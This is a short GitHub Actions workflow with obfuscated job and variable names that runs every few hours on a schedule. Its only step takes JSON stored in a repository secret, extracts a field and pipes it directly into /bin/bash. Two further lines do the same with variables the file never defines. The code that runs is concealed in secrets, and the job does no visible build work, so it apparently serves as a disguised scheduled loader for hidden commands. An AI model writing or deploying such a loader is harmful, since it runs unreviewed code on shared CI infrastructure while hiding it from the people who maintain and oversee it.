name: mingyulu1837
on:
  workflow_dispatch:
  schedule:
    - cron: '18 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mingyulu1837
        env:
          udmjn015: ${{ secrets.udmjn015 }}
        run: |
          echo $udmjn015 | jq -r .lzup0 | /bin/bash
          echo $m92 | jq -r .tdi97851 | /bin/bash
          echo $rxwwk5 | jq -r .ssrmg8063 | /bin/bash

